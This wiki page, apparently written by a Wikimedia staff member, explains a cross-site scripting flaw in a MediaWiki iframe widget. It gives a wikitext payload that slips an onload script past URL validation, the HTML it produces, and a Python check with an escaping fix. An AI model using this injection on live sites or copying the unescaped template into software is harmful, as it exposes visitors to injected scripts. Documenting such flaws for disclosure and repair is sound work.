User:BWolff (WMF)/CSP/4
Example
For example:
The iframe widget is defined as:
<includeonly><iframe src="<!--{$url|validate:url}-->" style="border: <!--{$border|escape:html|default:0}-->" width="<!--{$width|escape:html|default:400}-->" height="<!--{$height|escape:html|default:300}-->"></iframe></includeonly>
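Note that the url parameter only goes through validate:url, while the other parameters go through escape:html. If we have the wikitext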
{{#widget:iframe|width=0|height=0|url=https://example.com/"onl{{safesubst:ns:0}}oad="alert('All\40your\40base\40are\40belong\40to\40us')}}
then, because {{safesubst:ns:0}} expands to the empty string, it results in the HTML:
<p><iframe src="https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')" style="border: 0" width="0" height="0"></iframe> </p>
This causes "All your base are belong to us" to show up in a pop-up box.
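The check and the fix for the case above, as an added example (not code from this page or from the Widgets extension): a Python model of the widget's src slot that parses the rendered HTML and reports any attribute the template never defined. `looks_like_url` is a hypothetical stand-in for validate:url and assumes it checks only scheme and host; the function and constant names are likewise made up for this sketch.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# url parameter from the wikitext above, after {{safesubst:ns:0}} has
# expanded to the empty string.
URL_PARAM = r'''https://example.com/"onload="alert('All\40your\40base\40are\40belong\40to\40us')'''
ALLOWED = {"src", "style", "width", "height"}  # attributes the widget defines


def looks_like_url(value):
    """Hypothetical stand-in for validate:url: checks scheme and host only."""
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render(url, escape_attr):
    """Fill the widget's src slot, optionally HTML-escaping the value."""
    if not looks_like_url(url):
        return ""
    src = escape(url, quote=True) if escape_attr else url
    return f'<iframe src="{src}" style="border: 0" width="0" height="0"></iframe>'


class IframeAttrs(HTMLParser):
    """Records the attributes an HTML parser sees on the first <iframe>."""
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe" and self.attrs is None:
            self.attrs = dict(attrs)


def iframe_attrs(html):
    parser = IframeAttrs()
    parser.feed(html)
    parser.close()
    return parser.attrs or {}


def unexpected_attrs(html):
    """Attribute names on the iframe that the widget template never defined."""
    return sorted(set(iframe_attrs(html)) - ALLOWED)


if __name__ == "__main__":
    print("validate only:", unexpected_attrs(render(URL_PARAM, False)))
    print("plus escaping:", unexpected_attrs(render(URL_PARAM, True)))
```

In the widget definition the corresponding change would be to apply escape:html to the url value as well, as the other three parameters already do (assuming the modifiers can be chained after validate:url).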